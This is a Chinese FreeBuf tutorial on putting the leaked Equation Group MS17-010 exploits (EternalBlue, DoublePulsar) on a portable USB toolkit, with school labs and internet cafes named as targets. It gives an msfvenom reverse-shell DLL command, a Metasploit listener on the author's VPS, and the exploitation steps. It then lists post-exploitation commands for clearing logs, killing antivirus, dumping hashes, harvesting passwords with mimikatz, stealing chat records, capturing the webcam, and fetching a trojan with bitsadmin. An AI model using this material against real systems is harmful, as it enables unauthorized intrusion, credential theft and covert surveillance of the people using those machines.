*本文原创作者:ssooking,本文属FreeBuf原创奖励计划,未经许可禁止转载 一. 前言前段时间Shadow Broker披露了 Windows大量漏洞,甚至爆出黑客组织 Equation Group 对于Windows 远程漏洞 MS17-010 的利用工具,该漏洞影响范围之广,堪称杀器。可以看看官方通告。大伙们也忙的热火朝天~~于是想着把攻击环境移植到u盘里,然后比如去学校机房,网吧。 这里分享一下个人的移植过程,以及在使用攻击代码过程中遇到的问题,思路就是利用现成的神器pentestbox,向里添加攻击代码以及其运行需要的python环境。 二. 环境移植过程Pentest Box是一款Windows平台下预配置的便携式开源渗透测试环境,集成了各种编译运行环境,具体的可以到网上了解一下。 1. 工具准备:Pentestbox: https://pentestbox.org/zh/ 方程式工具包: EQGRP_Lost_in_Translation https://github.com/x0rz/EQGRP_Lost_in_Translation/tree/master python环境 必须在Python2.6 和 pywin32-221环境下,如果你用其他环境,会报各种诸如模块/dll缺失等错误 ![](https://image.3001.net/2017/04/4f1198f61d050b967c06615a030217b65.png)
Python2.6 和 pywin32-221位数需要相同,我用的是32位的 Python2.6.6 (32) 下载链接:https://www.python.org/download/releases/2.6.6/ pywin32-221(32) 下载链接: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/pywin32-221.win32-py2.6.exe/download 2. Pentestbox下python2.6环境配置分别安装,然后你会得到攻击包运行的python2.6环境 ![](https://image.3001.net/2017/04/2e7c6548d0e1804ebb396c045a86c54b5.png)
在Python26\Lib\site-packages目录下,你会发现插件也已经安装 ![](https://image.3001.net/2017/04/fcc2e591488a0ea47f0171651a0102e15.png)
然后把python26这个文件夹拷贝到你的pentestbox环境变量目录下:Pentestbox\base 刚才你也可以直接装到pentestbox\base下 ![](https://image.3001.net/2017/04/0869acc49d502c30f1f8cbebcc64918c5.png)
然后我们添加python2.6环境变量,在Pentestbox \config\alias文件中加一行 python26=”%pentestbox_ROOT%\base\Python26\python.exe” $* ![](https://image.3001.net/2017/04/22b61f61f49bd49a84c47233c70183ff5.png)
然后我们启动pentestbox,由于pentestbox通过线程注入挂钩cmd.exe来调用系统命令,因此杀软可能会提示警告,信任即可。 ![](https://image.3001.net/2017/04/034d2d767c5dc34b56cb644ce11248f65.png)
这个时候,我们运行python26可以看到环境配置成功 ![](https://image.3001.net/2017/04/36751094820e1fadf2c59799d5cce3ef5.png)
3. 漏洞利用工具配置 我们下载EQGRP_Lost_in_Translation工具包,修改windows目录下fb.py,去除不必要的代码 ![](https://image.3001.net/2017/04/9f10dff60e982831e4770c85ae5165ef5.png)
![](https://image.3001.net/2017/04/43a1862f82eeb18bf6edb842ab109f4b5.png)
然后我们把windows文件夹复制到pentestbox目录下 ![](https://image.3001.net/2017/04/48fac7fdda1a9bbce4e5a0af3b7e46835.png) 这里我把windows里的文件放到pentestbox根目录下的ms17-010文件夹内 ![](https://image.3001.net/2017/04/d72452ebfa42654d0cb397baaf63e4f05.png)
我们进入ms07-010目录并执行python26 fb.py ![](https://image.3001.net/2017/04/ee9fbfedf2540e5f10cd82e2ed2878a45.png)
这样我们就可以启动攻击程序了 ![](https://image.3001.net/2017/04/2ef4f1cad48cd5eb4e581edb6ad7f11e5.png) 三. 攻击示例攻击机:192.168.1.106 靶机: 192.168.1.111 windows x64 SP1 我们先用msf生成dll木马,用于控制目标 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxxx LPORT=9999 -f dll > 9999-64.dll Pentestbox里自带的metasploit框架我在使用总是时出现问题,我一般不用它,我通常是在自己的vps服务器进行监听 本地测试时候可以找一台kali攻击机 dll木马我们可以提前生成好放在u盘里带着,随时备用*_* 接下来我们用Msf进行监听 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST IP (这里填写vps的内网ip,记得开放监听端口) set LPORT 9999 set stagerverifysslcert false exploit -j
![](https://image.3001.net/2017/04/0e16aace346f4e882f2456234ed468425.png)
如果没有设置set stagerverifysslcert false,获取shell的时候可能会出现这样的情况 ![](https://image.3001.net/2017/04/811a9cbad35cf099b081e4177d89f6e75.png)
回到fb.py中,开始攻击 [?] Default Target IP Address [] : 攻击目标 [?] Default Callback IP Address [] : 本机ip [?] Use Redirection [yes] : no 是否重定向 [?] Base Log directory [D:\logs] : 是否输出日志 然后创建一个项目实例 ![](https://image.3001.net/2017/04/a9a092b8dddff439baa589d5f02f964f5.png)
如果你之前创建过实例,可以选择它,改设置,也可以重新创建一个 ![](https://image.3001.net/2017/04/b7a1379b5cbc3067231e800bbefc05335.png)
输入命令 use 可以查看我们利用的exp模块 我们使用EternalBlue模块,use EternalBlue ![](https://image.3001.net/2017/04/110331facfff33f7b032aa91c5a422f95.png)
下面一直回车就行 ![](https://image.3001.net/2017/04/ef97a15039fba620f9273b84f78e53015.png)
选择攻击目标的系统 ![](https://image.3001.net/2017/04/2f0a0c3dac53588f3a86859675c4b2fe5.png)
这里会询问你payload传输方式 选择1,感觉更稳定些 ![](https://image.3001.net/2017/04/85a7032990db9f2248f5f60184dfc0e35.png)
![](https://image.3001.net/2017/04/3d86b83f2379a16a2ef8cf4a899e85f15.png)
继续回车,确认信息 ![](https://image.3001.net/2017/04/94389c851f1a40cbbd5ac73e79cb07ec5.png)
![](https://image.3001.net/2017/04/97f6d729521da2ec855fbe6124e5ed805.png) 成功之后,我们使用doublepulsar模块 ![](https://image.3001.net/2017/04/8dfd507773c728b331819c29ae4b890a5.png)
继续一路回车 ![](https://image.3001.net/2017/04/225333534542f4308678f420c6c8fbb25.png)
选择协议 ![](https://image.3001.net/2017/04/3066a988deaec1d404601ea9ad3f069d5.png)
选择目标系统 ![](https://image.3001.net/2017/04/1909043ec32e444c997285bea7bf50a45.png)
选择攻击方式,我们利用dll木马 ![](https://image.3001.net/2017/04/9223922f3a70e3989c28582fb0a0ef375.png)
设置dll木马路径,我已经提前生成好放在u盘里随身携带,随时备用~ ![](https://image.3001.net/2017/04/27b508788fd2c6d0b722f08f32e564125.png)
![](https://image.3001.net/2017/04/5c76c2280492ed2d97d98bb3622edec85.png)
然后设置要注入的程序,默认是lsass.exe ![](https://image.3001.net/2017/04/646653966afe8879bdbd363ce2f3ba0b5.png) 这里注入的进程会对目标造成影响,也试了几个其他程序,比如注explorer时候,会弹出一个报错框 注入其他进程,有时候或多或少都会出那么点问题 ![](https://image.3001.net/2017/04/38c6aa67359276b79182d167df549c795.png)
![](https://image.3001.net/2017/04/32c761c337dd8f08fee7569e0d6b747e5.png)
然后是一路回车 ![](https://image.3001.net/2017/04/41ec1da6c66a496680664ca31d6d07935.png)
![](https://image.3001.net/2017/04/f79e0dcbe8a1534a697e242cfd57a19a5.png)
![](https://image.3001.net/2017/04/e4e5ce3034704013c98335850c7de05f5.png)
最后一步执行攻击 ![](https://image.3001.net/2017/04/92c19108d6debf35d5f14d57d2ce2a965.png)
Msf这里成功获取shell ![](https://image.3001.net/2017/04/0bba88da2357d39e9c02d68816fb79215.png)
![](https://image.3001.net/2017/04/3e3ded820afcc484e75ff77029d0891b5.png)
截个屏看看 ![](https://image.3001.net/2017/04/e86a3debc0a8e0c5b8e9d35cacc8952f5.png)
![](https://image.3001.net/2017/04/ea42be751f0f5cd4c69d4780d12cc9d85.png)
一个正在成长中的团队,欢迎交流,分享,合作~ 四. 后渗透辅助命令下面是一些示例命令,配合这些命令,happy to play~ meterpreter upload /root/nc.exe c:\\windows\\system32 #上传文件 search –d c:\\windows –f *.mdb #在目标主机Windows目录中搜索文件s 执行程序 execute -H -i -f cmd.exe #隐藏执行cmd并与之交互 execute -H -m -d calc.exe -f wce.exe -a “-o foo.txt” #隐藏执行,并显示虚假运行程序 我们可以用远控生成一个木马传过去 ![](https://image.3001.net/2017/04/a36beaa4671fcf588674a3bb39eb03ff5.png)
![](https://image.3001.net/2017/04/cb12ca6575a3e05cf74725c2c4c6c3e85.png)
![](https://image.3001.net/2017/04/e58c909ec4346e1e88f4d593e62df1e35.png)
例:下载目标聊天记录到本地/tmp目录下,可用Qqlogger查看 download c:\\Programs Files\\Tecent\\QQ\\Users\\qq号\\Msg2.0.db /tmp run webcam -p 图片保存路径 #开启目标摄像头并截图 run packetrecorder –i 会话序号 #捕获流量数据包.pcap 提权 use privs getsystem getuid clearev –清除日志 run killav –干掉杀软 文件关联 改变文件类型关联DLL到 txt文件类型: assoc .dll=txtfile 改变文件类型关联EXE 到png文件类型: assoc .exe=pngfile 改变文件类型关联MP3到jpg文件类型: assoc .mp3=jpgfile Hash获取 hashdump或run hashdump或run smart_hashdump >run post/windows/gather/hashdump >run /windows/gather/smart_hashdump –可绕过windows UAC控制 用kiwi获取明文密码: meterpreter>load kiwi meterpreter> creds_all Metaspolit中使用Mimikatz: 使用metasploit内建的命令: meterpreter > load mimikatz meterpreter > msv #msv creden meterpreter > kerberostials #kerberos credentials 使用mimikatz自带的命令: meterpreter > mimikatz_command -f samdump::hashes meterpreter > mimikatz_command -f sekurlsa::searchPasswords <前面一句命令在密码超过14位时LM会为空,后一句命令可以得到明文> 利用windows命令下载文件 bitsadmin /transfer mydownJob /download /priority normal “http://url/muma.exe” “F:\muma.exe “ 详细用法可参考:https://technet.microsoft.com/zh-cn/library/cc753856(v=ws.10).aspx 最后: 4月18日下午有人在i春秋发布了批量利用脚本 https://bbs.ichunqiu.com/thread-21863-1-1.html *本文原创作者:ssooking,本文属FreeBuf原创奖励计划,未经许可禁止转载 https://www.freebuf.com/articles/system/132274.html
|